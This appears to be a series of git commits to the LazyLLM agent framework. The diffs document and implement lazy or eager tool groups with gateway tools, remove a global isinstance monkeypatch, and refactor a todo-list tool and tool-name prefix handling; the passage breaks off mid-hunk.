+- A ``(instance, key_source)`` tuple (instance tool group with a runtime credential source)
+- A ``dict``: defines a tool group inline, with the format ``dict(name='grp', desc='...', tools=[...], lazy=True)``. ``name`` and ``tools`` are required fields.
+
+Tool groups (``ToolGroup``) support two modes:
+
+- **lazy mode** (default): Initially only a ``get_<name>_methods`` gateway tool is exposed to the LLM. After the LLM calls it, the child tool descriptions are dynamically injected into the system prompt, and the LLM selects and calls the actual tool in the next turn. Suitable when there are many tools and you want to reduce context length.
+- **eager mode** (``lazy=False``): All child tool descriptions are expanded and injected into the system prompt immediately, matching the previous behavior.
+
+Tool groups support multi-level nesting; child nodes can be plain tools or another tool group (defined via a nested ``dict``).
 
 Args:
-    tools (List[str]): A list of tool name strings.
+    tools (List): Tool list. Each element can be a string, Callable, ModuleTool, an instance with ``__public_apis__``, a ``(instance, key_source)`` tuple, or a ``dict`` tool group.
     return_trace (bool): If True, return intermediate steps and tool calls.
     sandbox (LazyLLMSandboxBase | None): A sandbox instance. When provided, tools with ``execute_in_sandbox`` set to True will be executed inside this sandbox, with automatic file upload/download handling.
 
@@ -190,6 +216,36 @@ add_example('ToolManager', """\
 >>> tm = ToolManager(tools)
 >>> print(tm([{'name': 'get_n_day_weather_forecast', 'arguments': {'location': 'Beijing', 'num_days': 3}}])[0])
 '{"location": "Beijing", "temperature": "85", "unit": "fahrenheit", "num_days": 3}'
+
+>>> # Using dict to define a lazy tool group (reduces initial context length)
+>>> def search_web(query: str) -> str:
+...     '''Search the web.
+...
+...     Args:
+...         query (str): Search query.
+...
+...     Returns:
+...         str: Search results.
+...     '''
+...     return f'results for {query}'
+...
+>>> def search_news(query: str) -> str:
+...     '''Search news articles.
+...
+...     Args:
+...         query (str): News search query.
+...
+...     Returns:
+...         str: News results.
+...     '''
+...     return f'news for {query}'
+...
+>>> tm2 = ToolManager([
+...     dict(name='search', desc='Web and news search tools', tools=[search_web, search_news]),
+... ])
+>>> # Initially only the gateway tool is visible
+>>> [d['function']['name'] for d in tm2.tools_description]
+['get_search_methods']
 """)
 
 add_agent_chinese_doc('register', '''\
@@ -798,7 +854,7 @@ ReactAgent是按照 `Thought->Action->Observation->Thought...->Finish` 的流程
 
 Args:
     llm: 大语言模型实例，用于生成推理和工具调用决策
-    tools (List): 可用工具列表，每个元素支持以下四种形式：
+    tools (List): 可用工具列表，每个元素支持以下几种形式：
 
         - ``str``：已注册工具的名称，如 ``"multiply_tool"``。
         - ``Callable``：直接传入函数，会被临时注册为工具。
@@ -810,6 +866,10 @@ Args:
           ``key_source`` 支持字符串（``'env.XXX'``、``'config.xxx'``、``'globals.config.xxx'``，无 ``.`` 时等价于 ``globals.config.xxx``）、
           callable（如 ``lambda inst: inst._key``）或上述类型的列表（任一满足即可）；
           凭据不存在时，该实例的所有工具均从 LLM 可见列表中隐藏，LLM 不会尝试调用它们。
+        - ``dict``：直接定义一个工具组，格式为 ``dict(name='grp', desc='描述', tools=[...], lazy=True)``。
+          ``name`` 和 ``tools`` 为必填字段；``lazy=True``（默认）时初始只暴露 ``get_<name>_methods`` gateway 工具，
+          LLM 调用后子工具描述动态注入 system prompt；``lazy=False`` 时直接展开所有子工具。
+          支持多级嵌套，子 ``tools`` 列表中可以再嵌套 ``dict`` 工具组。
 
     max_retries (int): 工具调用循环的最大轮次，超出后若 `force_summarize=True` 则触发强制总结，否则抛出异常，默认为5
     return_trace (bool): 是否返回完整的执行轨迹，用于调试和分析，默认为False
@@ -830,7 +890,7 @@ ReactAgent follows the `Thought->Action->Observation->Thought...->Finish` loop t
 
 Args:
     llm: The large language model instance used for reasoning and tool-call decisions.
-    tools (List): List of available tools. Each element can be one of four forms:
+    tools (List): List of available tools. Each element can be one of the following:
 
         - ``str``: Name of a registered tool, e.g. ``"multiply_tool"``.
         - ``Callable``: A plain function passed directly; it is temporarily registered as a tool.
@@ -842,6 +902,10 @@ Args:
           ``key_source`` accepts a string (``'env.XXX'``, ``'config.xxx'``, ``'globals.config.xxx'``; no dot means ``globals.config.xxx``),
           a callable (e.g. ``lambda inst: inst._key``), or a list of the above (available if any resolves to a non-empty value).
           When the credential is absent, all tools from that instance are hidden from the LLM's visible tool list and will not be called.
+        - ``dict``: Defines a tool group inline, with the format ``dict(name='grp', desc='...', tools=[...], lazy=True)``.
+          ``name`` and ``tools`` are required fields. When ``lazy=True`` (default), only a ``get_<name>_methods`` gateway tool is initially
+          exposed; after the LLM calls it, child tool descriptions are dynamically injected into the system prompt. When ``lazy=False``,
+          all child tools are expanded immediately. Multi-level nesting is supported by embedding ``dict`` groups inside ``tools``.
 
     max_retries (int): Maximum number of tool-call loop iterations. When exceeded, the force-summarize fallback is triggered (if enabled) or an exception is raised. Defaults to 5.
     return_trace (bool): Whether to return the full execution trace for debugging and analysis. Defaults to False.
@@ -1996,7 +2060,7 @@ add_toolsmgr_chinese_doc('InstanceToolGroup.get_description', '''\
 返回该工具组的 OpenAI function calling 格式描述列表。
 
 若 should_skip() 返回 True（凭据不可用），则返回空列表，LLM 不会感知到该组内的任何工具；
-否则返回所有工具的描述列表，每个元素为符合 OpenAI function calling 规范的字典。
+否则以 lazy 模式返回 gateway 工具描述（``get_<name>_methods``），LLM 调用后子工具描述动态注入 system prompt。
 
 Returns:
     List[Dict]: 工具描述字典列表。当凭据不可用时返回空列表。
@@ -2006,10 +2070,150 @@ add_toolsmgr_english_doc('InstanceToolGroup.get_description', '''\
 Returns the list of tool descriptions in OpenAI function calling format for this tool group.
 
 If should_skip() returns True (credential unavailable), an empty list is returned so the LLM is unaware of any tools in this group;
-otherwise returns the description list for all tools, where each element is a dict conforming to the OpenAI function calling specification.
+otherwise returns the gateway tool description (``get_<name>_methods``) in lazy mode; child tool descriptions are dynamically injected into the system prompt after the LLM calls the gateway.
 
 Returns:
     List[Dict]: List of tool description dicts. Returns an empty list when the credential is unavailable.
+''')
+
+add_toolsmgr_chinese_doc('ToolGroup', '''\
+工具组类，用于将多个工具（或子工具组）组织为一个有名称的集合，并以 lazy 或 eager 模式向 LLM 暴露。
+
+支持两种模式：
+
+- **lazy 模式**（默认，``lazy=True``）：初始只向 LLM 暴露一个 ``get_<name>_methods`` gateway 工具。
+  LLM 调用该工具后，子工具描述动态注入 system prompt，LLM 在下一轮中再选择并调用具体工具。
+  适合工具数量多、希望减少初始上下文长度的场景。
+- **eager 模式**（``lazy=False``）：直接把所有子工具描述展开注入 system prompt，与旧行为一致。
+
+支持多级嵌套：子 ``tools`` 列表中可以包含普通工具（函数、``ModuleTool``）或另一个 ``ToolGroup``（通过嵌套 ``dict`` 定义）。
+
+通常不需要直接实例化 ``ToolGroup``，而是通过向 ``ToolManager``（或 Agent 的 ``tools`` 参数）传入 ``dict`` 来隐式创建：
+
+.. code-block:: python
+
+    tools = [
+        tool1,
+        dict(name='search', desc='搜索工具集', tools=[search_web, search_news]),
+        dict(name='advanced', desc='高级工具', tools=[
+            tool2,
+            dict(name='sub_ops', desc='子工具集', lazy=False, tools=[tool3, tool4]),
+        ]),
+    ]
+
+Args:
+    tools (List): 子工具列表，每个元素可以是函数、``ModuleTool`` 实例、``ToolGroup`` 实例，或嵌套 ``dict``（格式同上）。
+    name (str): 工具组名称，必填。用于生成 gateway 工具名 ``get_<name>_methods``，以及在激活后标识该组。
+    desc (str): 工具组描述，会作为 gateway 工具的 description 展示给 LLM。
+    lazy (bool): 是否使用 lazy 模式，默认 True。
+    key_source: 凭据来源，格式与 ``InstanceToolGroup`` 的 ``key_source`` 参数相同。凭据不可用时整个工具组从 LLM 可见列表中隐藏。
+''')
+
+add_toolsmgr_english_doc('ToolGroup', '''\
+Tool group class that organizes multiple tools (or sub-groups) into a named collection and exposes them to the LLM in lazy or eager mode.
+
+Two modes are supported:
+
+- **lazy mode** (default, ``lazy=True``): Initially only a ``get_<name>_methods`` gateway tool is exposed to the LLM.
+  After the LLM calls it, child tool descriptions are dynamically injected into the system prompt, and the LLM selects and calls the actual tool in the next turn.
+  Suitable when there are many tools and you want to reduce the initial context length.
+- **eager mode** (``lazy=False``): All child tool descriptions are expanded and injected into the system prompt immediately, matching the previous behavior.
+
+Multi-level nesting is supported: the ``tools`` list can contain plain tools (functions, ``ModuleTool``) or another ``ToolGroup`` (defined via a nested ``dict``).
+
+Typically you do not instantiate ``ToolGroup`` directly; instead, pass a ``dict`` to ``ToolManager`` (or the Agent's ``tools`` parameter) to create one implicitly:
+
+.. code-block:: python
+
+    tools = [
+        tool1,
+        dict(name='search', desc='Search tools', tools=[search_web, search_news]),
+        dict(name='advanced', desc='Advanced tools', tools=[
+            tool2,
+            dict(name='sub_ops', desc='Sub-tools', lazy=False, tools=[tool3, tool4]),
+        ]),
+    ]
+
+Args:
+    tools (List): Child tool list. Each element can be a function, ``ModuleTool`` instance, ``ToolGroup`` instance, or a nested ``dict`` (same format as above).
+    name (str): Tool group name. Required. Used to generate the gateway tool name ``get_<name>_methods`` and to identify the group after activation.
+    desc (str): Tool group description, shown to the LLM as the gateway tool's description.
+    lazy (bool): Whether to use lazy mode. Defaults to True.
+    key_source: Credential source, same format as the ``key_source`` parameter of ``InstanceToolGroup``. When the credential is unavailable, the entire tool group is hidden from the LLM.
+''')
+
+add_toolsmgr_example('ToolGroup', '''\
+>>> import lazyllm
+>>> from lazyllm.tools import ToolManager
+>>> from lazyllm import init_session, locals as lazyllm_locals
+>>>
+>>> def search_web(query: str) -> str:
+...     """Search the web.
+...
+...     Args:
+...         query (str): Search query.
+...
+...     Returns:
+...         str: Search results.
+...     """
+...     return f"web results for {query}"
+...
+>>> def search_news(query: str) -> str:
+...     """Search news articles.
+...
+...     Args:
+...         query (str): News search query.
+...
+...     Returns:
+...         str: News results.
+...     """
+...     return f"news for {query}"
+...
+>>> # Lazy mode (default): only gateway tool is visible initially
+>>> tm = ToolManager([
+...     dict(name='search', desc='Web and news search tools', tools=[search_web, search_news]),
+... ])
+>>> [d['function']['name'] for d in tm.tools_description]
+['get_search_methods']
+>>>
+>>> # After the LLM calls the gateway tool, child tools become visible
+>>> init_session()
+>>> lazyllm_locals['_lazyllm_agent'] = {'workspace': {}}
+>>> gateway = tm._tool_call['get_search_methods']
+>>> result = gateway({})
+>>> print(result)
+Activated tool group "search". Available tools: search_web, search_news
+>>> [d['function']['name'] for d in tm.tools_description]
+['get_search_methods', 'search_web', 'search_news']
+>>>
+>>> # Eager mode: all tools visible immediately
+>>> tm2 = ToolManager([
+...     dict(name='search', desc='Search tools', lazy=False, tools=[search_web, search_news]),
+... ])
+>>> [d['function']['name'] for d in tm2.tools_description]
+['search_web', 'search_news']
+>>>
+>>> # Multi-level nesting
+>>> def calc_add(a: str, b: str) -> str:
+...     """Add two numbers.
+...
+...     Args:
+...         a (str): First number.
+...         b (str): Second number.
+...
+...     Returns:
+...         str: Sum.
+...     """
+...     return str(int(a) + int(b))
+...
+>>> tm3 = ToolManager([
+...     dict(name='outer', desc='Outer group', tools=[
+...         search_web,
+...         dict(name='inner', desc='Inner group', tools=[search_news, calc_add]),
+...     ]),
+... ])
+>>> [d['function']['name'] for d in tm3.tools_description]
+['get_outer_methods']
 ''')
 
 add_toolsmgr_chinese_doc('MethodModuleTool', '''\

--- a/lazyllm/flow/flow.py
+++ b/lazyllm/flow/flow.py
@@ -1,5 +1,4 @@
 import lazyllm
-import builtins
 from lazyllm import config
 from lazyllm.common import LazyLLMRegisterMetaClass, package, kwargs, arguments, bind
 from lazyllm.common import ReadOnlyWrapper, LOG, globals, locals, _get_callsite
@@ -32,9 +31,15 @@ class FlowException(HandledException):
 
 class _FuncWrap(object):
     def __init__(self, f):
-        self._f = f._f if isinstance(f, _FuncWrap) else f
+        self._f = f._f if type.__instancecheck__(_FuncWrap, f) else f
         self._hooks = []
         register_hooks(self, resolve_builtin_hooks(self))
+
+    # Make isinstance(func_wrap, T) equivalent to isinstance(func_wrap._f, T) for all T,
+    # while type(func_wrap) still returns _FuncWrap (so cloudpickle/pickle are unaffected).
+    @property
+    def __class__(self):
+        return type(self._f)
 
     @execution_with_hooks
     def __call__(self, *args, **kw): return self._f(*args, **kw)
@@ -49,15 +54,6 @@ class _FuncWrap(object):
         if __key != '_f':
             return getattr(self._f, __key)
         return super(__class__, self).__getattr__(__key)
-
-
-_oldins = isinstance
-def new_ins(obj, cls):
-    if _oldins(obj, _FuncWrap) and os.getenv('LAZYLLM_ON_CLOUDPICKLE', None) != 'ON':
-        return True if (cls is _FuncWrap or (_oldins(cls, (tuple, list)) and _FuncWrap in cls)) else _oldins(obj._f, cls)
-    return _oldins(obj, cls)
-
-builtins.isinstance = new_ins
 
 def _is_function(f):
     return isinstance(f, (types.BuiltinFunctionType, types.FunctionType,

--- a/lazyllm/tools/__init__.py
+++ b/lazyllm/tools/__init__.py
@@ -23,7 +23,7 @@ if TYPE_CHECKING:
         ModuleTool,
         SkillManager,
         install_skill,
-        TodoWrite,
+        todo_write,
     )
     from .sandbox import LazyLLMSandboxBase, DummySandbox, SandboxFusion
     from .classifier import IntentClassifier
@@ -96,7 +96,7 @@ _SUBMOD_MAP = {
         'ReWOOAgent',
         'SkillManager',
         'install_skill',
-        'TodoWrite',
+        'todo_write',
     ],
     'sandbox': [
         'LazyLLMSandboxBase',

--- a/lazyllm/tools/__init__.py
+++ b/lazyllm/tools/__init__.py
@@ -23,6 +23,7 @@ if TYPE_CHECKING:
         ModuleTool,
         SkillManager,
         install_skill,
+        TodoWrite,
     )
     from .sandbox import LazyLLMSandboxBase, DummySandbox, SandboxFusion
     from .classifier import IntentClassifier
@@ -95,6 +96,7 @@ _SUBMOD_MAP = {
         'ReWOOAgent',
         'SkillManager',
         'install_skill',
+        'TodoWrite',
     ],
     'sandbox': [
         'LazyLLMSandboxBase',

--- a/lazyllm/tools/agent/__init__.py
+++ b/lazyllm/tools/agent/__init__.py
@@ -8,7 +8,7 @@ from .toolsManager import ModuleTool
 from .code_interpreter import code_interpreter
 from .skill_manager import SkillManager
 from .skill_hub import install_skill
-from .todo_tool import TodoWrite
+from .todo_tool import todo_write
 
 __all__ = [
     'ToolManager',
@@ -23,5 +23,5 @@ __all__ = [
     'code_interpreter',
     'SkillManager',
     'install_skill',
-    'TodoWrite',
+    'todo_write',
 ]

--- a/lazyllm/tools/agent/__init__.py
+++ b/lazyllm/tools/agent/__init__.py
@@ -8,6 +8,7 @@ from .toolsManager import ModuleTool
 from .code_interpreter import code_interpreter
 from .skill_manager import SkillManager
 from .skill_hub import install_skill
+from .todo_tool import TodoWrite
 
 __all__ = [
     'ToolManager',
@@ -22,4 +23,5 @@ __all__ = [
     'code_interpreter',
     'SkillManager',
     'install_skill',
+    'TodoWrite',
 ]

--- a/lazyllm/tools/agent/todo_tool.py
+++ b/lazyllm/tools/agent/todo_tool.py
@@ -1,5 +1,5 @@
 from lazyllm import locals as lazyllm_locals
-from .toolsManager import ModuleTool, register
+from .toolsManager import register
 from typing import List, Dict
 
 _VALID_STATUSES = {'pending', 'in_progress', 'completed', 'cancelled'}
@@ -10,49 +10,45 @@ _TODO_HEADER = (
 )
 
 
-@register('builtin_tools')
-class TodoWrite(ModuleTool):
-    def __init__(self):
-        super().__init__(execute_in_sandbox=False)
-
-    def apply(self, todos: List[Dict], merge: bool = False) -> str:
-        '''Write or update the todo list for the current agent session.
+@register('builtin_tools', execute_in_sandbox=False)
+def todo_write(todos: List[Dict], merge: bool = False) -> str:
+    '''Write or update the todo list for the current agent session.
 Use this tool to create a plan at the start of a task, and update progress as you work.
 
 Args:
-    todos (List[Dict]): List of todo items to write or update. Each dict must contain:
-        id (str): Unique identifier for the todo item (e.g. "1", "setup-db").
-        content (str): Description of the task.
-        status (str): Current status, must be one of: pending, in_progress, completed, cancelled.
-        When merge=True, only include items you want to create or update; others are unchanged.
-    merge (bool): If False (default), replace the entire todo list with the provided items.
-        If True, merge into the existing list: update items with matching id, add new ones.
+todos (List[Dict]): List of todo items to write or update. Each dict must contain:
+    id (str): Unique identifier for the todo item (e.g. "1", "setup-db").
+    content (str): Description of the task.
+    status (str): Current status, must be one of: pending, in_progress, completed, cancelled.
+    When merge=True, only include items you want to create or update; others are unchanged.
+merge (bool): If False (default), replace the entire todo list with the provided items.
+    If True, merge into the existing list: update items with matching id, add new ones.
 
 Returns:
-    str: Confirmation message with the current state of the todo list.
+str: Confirmation message with the current state of the todo list.
 '''
+    for item in todos:
+        if not all(k in item for k in ('id', 'content', 'status')):
+            raise ValueError(f'Each todo item must contain "id", "content" and "status", got: {item}')
+        if item['status'] not in _VALID_STATUSES:
+            raise ValueError(
+                f'Invalid status "{item["status"]}" for todo id="{item["id"]}". '
+                f'Must be one of: {", ".join(sorted(_VALID_STATUSES))}.'
+            )
+
+    agent_ctx = lazyllm_locals['_lazyllm_agent']
+    current: Dict[str, Dict] = agent_ctx.get('todo_list', {})
+
+    if not merge:
+        updated = {item['id']: item for item in todos}
+    else:
+        updated = dict(current)
         for item in todos:
-            if not all(k in item for k in ('id', 'content', 'status')):
-                raise ValueError(f'Each todo item must contain "id", "content" and "status", got: {item}')
-            if item['status'] not in _VALID_STATUSES:
-                raise ValueError(
-                    f'Invalid status "{item["status"]}" for todo id="{item["id"]}". '
-                    f'Must be one of: {", ".join(sorted(_VALID_STATUSES))}.'
-                )
+            updated[item['id']] = item
 
-        agent_ctx = lazyllm_locals['_lazyllm_agent']
-        current: Dict[str, Dict] = agent_ctx.get('todo_list', {})
+    agent_ctx['todo_list'] = updated
 
-        if not merge:
-            updated = {item['id']: item for item in todos}
-        else:
-            updated = dict(current)
-            for item in todos:
-                updated[item['id']] = item
-
-        agent_ctx['todo_list'] = updated
-
-        lines = [_TODO_HEADER, '', 'Here are the latest contents of your todo list:']
-        for item in updated.values():
-            lines.append(f'- **{item["status"].upper()}**: {item["content"]} (id: {item["id"]})')
-        return '\n'.join(lines)
+    lines = [_TODO_HEADER, '', 'Here are the latest contents of your todo list:']
+    for item in updated.values():
+        lines.append(f'- **{item["status"].upper()}**: {item["content"]} (id: {item["id"]})')
+    return '\n'.join(lines)

--- a/lazyllm/tools/agent/todo_tool.py
+++ b/lazyllm/tools/agent/todo_tool.py
@@ -1,0 +1,58 @@
+from lazyllm import locals as lazyllm_locals
+from .toolsManager import ModuleTool, register
+from typing import List, Dict
+
+_VALID_STATUSES = {'pending', 'in_progress', 'completed', 'cancelled'}
+
+_TODO_HEADER = (
+    'Successfully updated TODOs. Make sure to follow and update your TODO list as you make progress. '
+    'Cancel and add new TODO tasks as needed when the user makes a correction or follow-up request.'
+)
+
+
+@register('builtin_tools')
+class TodoWrite(ModuleTool):
+    def __init__(self):
+        super().__init__(execute_in_sandbox=False)
+
+    def apply(self, todos: List[Dict], merge: bool = False) -> str:
+        '''Write or update the todo list for the current agent session.
+Use this tool to create a plan at the start of a task, and update progress as you work.
+
+Args:
+    todos (List[Dict]): List of todo items to write or update. Each dict must contain:
+        id (str): Unique identifier for the todo item (e.g. "1", "setup-db").
+        content (str): Description of the task.
+        status (str): Current status, must be one of: pending, in_progress, completed, cancelled.
+        When merge=True, only include items you want to create or update; others are unchanged.
+    merge (bool): If False (default), replace the entire todo list with the provided items.
+        If True, merge into the existing list: update items with matching id, add new ones.
+
+Returns:
+    str: Confirmation message with the current state of the todo list.
+'''
+        for item in todos:
+            if not all(k in item for k in ('id', 'content', 'status')):
+                raise ValueError(f'Each todo item must contain "id", "content" and "status", got: {item}')
+            if item['status'] not in _VALID_STATUSES:
+                raise ValueError(
+                    f'Invalid status "{item["status"]}" for todo id="{item["id"]}". '
+                    f'Must be one of: {", ".join(sorted(_VALID_STATUSES))}.'
+                )
+
+        agent_ctx = lazyllm_locals['_lazyllm_agent']
+        current: Dict[str, Dict] = agent_ctx.get('todo_list', {})
+
+        if not merge:
+            updated = {item['id']: item for item in todos}
+        else:
+            updated = dict(current)
+            for item in todos:
+                updated[item['id']] = item
+
+        agent_ctx['todo_list'] = updated
+
+        lines = [_TODO_HEADER, '', 'Here are the latest contents of your todo list:']
+        for item in updated.values():
+            lines.append(f'- **{item["status"].upper()}**: {item["content"]} (id: {item["id"]})')
+        return '\n'.join(lines)

--- a/lazyllm/tools/agent/todo_tool.py
+++ b/lazyllm/tools/agent/todo_tool.py
@@ -13,19 +13,15 @@ _TODO_HEADER = (
 @register('builtin_tools', execute_in_sandbox=False)
 def todo_write(todos: List[Dict], merge: bool = False) -> str:
     '''Write or update the todo list for the current agent session.
-Use this tool to create a plan at the start of a task, and update progress as you work.
 
-Args:
-todos (List[Dict]): List of todo items to write or update. Each dict must contain:
-    id (str): Unique identifier for the todo item (e.g. "1", "setup-db").
-    content (str): Description of the task.
-    status (str): Current status, must be one of: pending, in_progress, completed, cancelled.
-    When merge=True, only include items you want to create or update; others are unchanged.
-merge (bool): If False (default), replace the entire todo list with the provided items.
-    If True, merge into the existing list: update items with matching id, add new ones.
+    Use this tool to create a plan at the start of a task, and update progress as you work.
 
-Returns:
-str: Confirmation message with the current state of the todo list.
+    Args:
+        todos (List[Dict]): Todo items to write or update; each dict needs id, content, status.
+        merge (bool): If False, replace the list; if True, merge by id. Defaults to False.
+
+    Returns:
+        str: Confirmation message with the current state of the todo list.
 '''
     for item in todos:
         if not all(k in item for k in ('id', 'content', 'status')):

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -309,63 +309,58 @@ def _build_tool_desc(tool: 'ModuleTool') -> Dict:
 
 class ToolGroup:
     def __init__(self, tools: List[Any], name: str, desc: str = '', lazy: bool = True,
-                 prefix: Optional[Union[bool, str]] = None):
+                 prefix: Optional[Union[bool, str]] = True, _outer_prefix: Optional[str] = None):
         self._name, self._desc, self._lazy = name, desc, lazy
-        self._prefix: Optional[str] = name if prefix is True or prefix == '' \
+        own_prefix: Optional[str] = name if prefix is True or prefix == '' \
             else None if prefix is False or prefix is None else prefix
+        effective_prefix = f'{_outer_prefix}_{own_prefix}' if _outer_prefix and own_prefix \
+            else (_outer_prefix or own_prefix)
+        self._effective_prefix = effective_prefix
         self._children: List[Union['ModuleTool', 'ToolGroup']] = []
         for item in tools:
-            built = _build_tool_from_element(item)
+            built = _build_tool_from_element(item, _outer_prefix=effective_prefix)
             if built is None:
                 raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, '
                                 f'got {type(item)}')
             self._children.append(built)
         self._gateway_tool: Optional['ModuleTool'] = self.make_gateway_tool() if lazy else None
 
-    def get_flat_tools(self, _prefix: Optional[str] = None) -> Dict[str, 'ModuleTool']:
-        effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
-            else (_prefix or self._prefix)
+    def get_flat_tools(self) -> Dict[str, 'ModuleTool']:
         result: Dict[str, ModuleTool] = {}
         if self._gateway_tool is not None:
             result[self._gateway_tool.name] = self._gateway_tool
         for child in self._children:
             if isinstance(child, ToolGroup):
-                result.update(child.get_flat_tools(effective))
+                result.update(child.get_flat_tools())
             else:
-                key = f'{effective}_{child.name}' if effective else child.name
+                key = f'{self._effective_prefix}_{child.name}' if self._effective_prefix else child.name
                 result[key] = child
         return result
 
-    def get_child_descriptions(self, _prefix: Optional[str] = None,
-                               active_groups: Optional[Set[str]] = None) -> List[Dict]:
-        effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
-            else (_prefix or self._prefix)
+    def get_child_descriptions(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
         descs = []
         for child in self._children:
             if isinstance(child, ToolGroup):
-                descs.extend(child.get_description(_prefix=effective, active_groups=active_groups))
+                descs.extend(child.get_description(active_groups=active_groups))
             else:
                 desc = _build_tool_desc(child)
-                if effective:
-                    desc['function']['name'] = f'{effective}_{child.name}'
+                if self._effective_prefix:
+                    desc['function']['name'] = f'{self._effective_prefix}_{child.name}'
                 descs.append(desc)
         return descs
 
-    def get_description(self, _prefix: Optional[str] = None,
-                        active_groups: Optional[Set[str]] = None) -> List[Dict]:
+    def get_description(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
         if not self._lazy or (active_groups is not None and self._name in active_groups):
-            return self.get_child_descriptions(_prefix, active_groups)
+            return self.get_child_descriptions(active_groups)
         return [_build_tool_desc(self._gateway_tool)]
 
-    def _collect_leaf_names(self, _prefix: Optional[str] = None) -> List[str]:
-        effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
-            else (_prefix or self._prefix)
+    def _collect_leaf_names(self) -> List[str]:
         names = []
         for child in self._children:
             if isinstance(child, ToolGroup):
-                names.extend(child._collect_leaf_names(effective))
+                names.extend(child._collect_leaf_names())
             else:
-                names.append(f'{effective}_{child.name}' if effective else child.name)
+                names.append(f'{self._effective_prefix}_{child.name}' if self._effective_prefix else child.name)
         return names
 
     def make_gateway_tool(self) -> 'ModuleTool':
@@ -429,10 +424,9 @@ class InstanceToolGroup(ToolGroup):
         sources = self._key_source if isinstance(self._key_source, list) else [self._key_source]
         return not any(bool(self._resolve_one_key(src)) for src in sources)
 
-    def get_description(self, _prefix: Optional[str] = None,
-                        active_groups: Optional[Set[str]] = None) -> List[Dict]:
+    def get_description(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
         if self.should_skip(): return []
-        return super().get_description(_prefix, active_groups)
+        return super().get_description(active_groups)
 
 
 TOOL_CALL_FORMAT_EXAMPLE = (
@@ -441,16 +435,17 @@ TOOL_CALL_FORMAT_EXAMPLE = (
 )
 
 
-def _build_tool_from_element(element: Any) -> Optional[Union['ModuleTool', 'ToolGroup']]:
+def _build_tool_from_element(
+        element: Any, _outer_prefix: Optional[str] = None) -> Optional[Union['ModuleTool', 'ToolGroup']]:
     if isinstance(element, (ToolGroup, ModuleTool)):
         return element
     if isinstance(element, dict):
         assert 'name' in element, "ToolGroup dict must have a 'name' field"
         assert 'tools' in element, "ToolGroup dict must have a 'tools' field"
         assert 'desc' in element, "ToolGroup dict must have a 'desc' field"
-        return ToolGroup(tools=element['tools'], name=element['name'],
-                         desc=element['desc'], lazy=element.get('lazy', True),
-                         prefix=element.get('prefix', None))
+        return ToolGroup(tools=element['tools'], name=element['name'], desc=element['desc'],
+                         lazy=element.get('lazy', True), prefix=element.get('prefix', None),
+                         _outer_prefix=_outer_prefix)
     if callable(element):
         register('tmp_tool')(element)
         tool = getattr(lazyllm.tmp_tool, element.__name__)()

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -315,7 +315,6 @@ class ToolGroup:
             else None if prefix is False or prefix is None else prefix
         effective_prefix = f'{_outer_prefix}_{own_prefix}' if _outer_prefix and own_prefix \
             else (_outer_prefix or own_prefix)
-        self._effective_prefix = effective_prefix
         self._children: List[Union['ModuleTool', 'ToolGroup']] = []
         for item in tools:
             built = _build_tool_from_element(item, _outer_prefix=effective_prefix)
@@ -324,44 +323,46 @@ class ToolGroup:
                                 f'got {type(item)}')
             self._children.append(built)
         self._gateway_tool: Optional['ModuleTool'] = self.make_gateway_tool() if lazy else None
+        self._precompute_descs(effective_prefix)
 
     def get_flat_tools(self) -> Dict[str, 'ModuleTool']:
         result: Dict[str, ModuleTool] = {}
         if self._gateway_tool is not None:
             result[self._gateway_tool.name] = self._gateway_tool
-        for child in self._children:
+        for child, precomputed in zip(self._children, self._expanded_descs):
             if isinstance(child, ToolGroup):
                 result.update(child.get_flat_tools())
             else:
-                key = f'{self._effective_prefix}_{child.name}' if self._effective_prefix else child.name
-                result[key] = child
+                result[precomputed['function']['name']] = child
         return result
 
-    def get_child_descriptions(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
-        descs = []
+    def _precompute_descs(self, effective_prefix: Optional[str] = None):
+        self._gateway_desc: Optional[Dict] = _build_tool_desc(self._gateway_tool) \
+            if self._gateway_tool is not None else None
+        self._expanded_descs: List[Union[Dict, 'ToolGroup']] = []
+        self._leaf_names: List[str] = []
         for child in self._children:
             if isinstance(child, ToolGroup):
-                descs.extend(child.get_description(active_groups=active_groups))
+                self._expanded_descs.append(child)
+                if child._lazy:
+                    self._leaf_names.append(child._gateway_tool.name)
+                else:
+                    self._leaf_names.extend(child._leaf_names)
             else:
                 desc = _build_tool_desc(child)
-                if self._effective_prefix:
-                    desc['function']['name'] = f'{self._effective_prefix}_{child.name}'
-                descs.append(desc)
-        return descs
+                final_name = f'{effective_prefix}_{child.name}' if effective_prefix else child.name
+                desc['function']['name'] = final_name
+                self._expanded_descs.append(desc)
+                self._leaf_names.append(final_name)
 
     def get_description(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
         if not self._lazy or (active_groups is not None and self._name in active_groups):
-            return self.get_child_descriptions(active_groups)
-        return [_build_tool_desc(self._gateway_tool)]
+            return [x for item in self._expanded_descs
+                    for x in (item.get_description(active_groups) if isinstance(item, ToolGroup) else [item])]
+        return [self._gateway_desc]
 
     def _collect_leaf_names(self) -> List[str]:
-        names = []
-        for child in self._children:
-            if isinstance(child, ToolGroup):
-                names.extend(child._collect_leaf_names())
-            else:
-                names.append(f'{self._effective_prefix}_{child.name}' if self._effective_prefix else child.name)
-        return names
+        return self._leaf_names
 
     def make_gateway_tool(self) -> 'ModuleTool':
         group_name = self._name
@@ -524,15 +525,11 @@ class ToolManager(ModuleBase):
         if isinstance(self._tools, List):
             self._tool_call: Dict[str, ModuleTool] = {}
             for item in self._tools:
-                if isinstance(item, ToolGroup):
-                    for name, tool in item.get_flat_tools().items():
-                        if name in self._tool_call:
-                            raise ValueError(f'Duplicate tool name [{name}]. Tool names must be unique.')
-                        self._tool_call[name] = tool
-                else:
-                    if item.name in self._tool_call:
-                        raise ValueError(f'Duplicate tool name [{item.name}]. Tool names must be unique.')
-                    self._tool_call[item.name] = item
+                items = item.get_flat_tools() if isinstance(item, ToolGroup) else {item.name: item}
+                for name, tool in items.items():
+                    if name in self._tool_call:
